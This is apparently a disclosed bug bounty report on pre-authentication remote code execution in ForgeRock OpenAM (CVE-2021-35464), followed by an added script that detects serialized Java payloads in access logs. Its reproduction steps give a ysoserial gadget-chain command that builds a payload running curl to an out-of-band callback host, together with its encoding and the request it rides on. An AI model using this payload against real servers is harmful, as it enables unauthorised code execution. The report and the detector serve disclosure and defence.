Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)

Disclosed: 2021-07-29 19:50:15 By fdeleite To deptofdefense
High
## Vulnerability Details

RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM.

### Supporting Material/References

- https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464

## Impact

An unauthenticated, 3rd-party attacker or adversary can execute remote code.

## System Host(s)

████

## Affected Product(s) and Version(s)

ForgeRock OpenAM

## CVE Numbers

CVE-2021-35464

## Steps to Reproduce

First we need to build the payload:

1. Download this jar file:

   ```
   wget https://github.com/Bin4xin/sweet-ysoserial/blob/master/target/ysoserial-0.0.6-SNAPSHOT-all.jar
   ```

   then

   ```
   java -jar ysoserial-master-SNAPSHOT.jar Click1 "curl https://g0h7qcjzwzpzdh2ar6b5f9x3puvkj9.burpcollaborator.net" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' | tr -d '\n' > payload.txt
   ```

   You need to change the Burp Collaborator id to test it properly. The payload is now saved in the payload.txt file.

Now we need to use the following request:

```
GET /██████████=XYZ HTTP/1.1
Host: 127.0.0.1
```

Replace **XYZ** with the payload saved in the payload.txt file.

The response:

```
HTTP/1.1 302 Found
Cache-Control: private
Location: https://127.0.0.1:443/openam/base/AMInvalidURL
Content-Length: 0
```

The HTTP request sent to the collaborator: ███

## Suggested Mitigation/Remediation Actions
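A detection-side check, added here as an example and not part of the original report: it reverses the encoding the steps above describe (URL-safe base64 with padding stripped, one leading 0x00 byte) and flags query parameters that decode to a Java serialization stream header, run over constructed access-log lines. The request path and parameter name are placeholders standing in for the values redacted in the report.

```python
import base64
import binascii
import re
# Java serialization stream header: STREAM_MAGIC 0xACED followed by STREAM_VERSION 5.
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"

def decode_urlsafe_b64(value: str):
    # Reverse the report's encoding (base64 | tr '/+' '_-' | tr -d '=') by restoring padding.
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.urlsafe_b64decode(padded)
    except (binascii.Error, ValueError):
        return None

def looks_like_java_serial(blob: bytes) -> bool:
    # Accept the header with or without the single 0x00 byte that the report's payload prepends.
    return blob.startswith(JAVA_SERIAL_MAGIC) or (
        blob[:1] == b"\x00" and blob[1:].startswith(JAVA_SERIAL_MAGIC))

def flag_request(path_and_query: str) -> list:
    # Names of query parameters whose value decodes to a Java serialization stream.
    hits = []
    for part in path_and_query.partition("?")[2].split("&"):
        name, _, value = part.partition("=")
        blob = decode_urlsafe_b64(value) if value else None
        if blob and looks_like_java_serial(blob):
            hits.append(name)
    return hits

def build_sample_param() -> str:
    # Constructed, harmless sample: only the stream header plus filler, encoded as in the report.
    blob = b"\x00" + JAVA_SERIAL_MAGIC + b"constructed-filler-not-a-gadget-chain"
    return base64.urlsafe_b64encode(blob).decode().rstrip("=")

# Constructed access-log lines (combined log format); path and parameter name are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Jul/2021:19:50:15 +0000] "GET /openam/UI/Login?realm=/ HTTP/1.1" 200 4321',
    '10.0.0.9 - - [29/Jul/2021:19:51:02 +0000] "GET /openam/REDACTED_PATH?PLACEHOLDER_PARAM='
    + build_sample_param() + ' HTTP/1.1" 302 0',
]
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT) (\S+) HTTP/')

def scan_access_log(lines: list) -> list:
    # (line index, flagged parameter names) for every request carrying a serialized payload.
    findings = []
    for idx, line in enumerate(lines):
        m = REQUEST_RE.search(line)
        hits = flag_request(m.group(1)) if m else []
        if hits:
            findings.append((idx, hits))
    return findings
```

The same decode-and-check logic applies to POST bodies and headers; the access-log form is shown because the report's request carries the payload in the query string.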
Report Stats
  • Report ID: 1248040
  • State: Closed
  • Substate: resolved
  • Upvotes: 10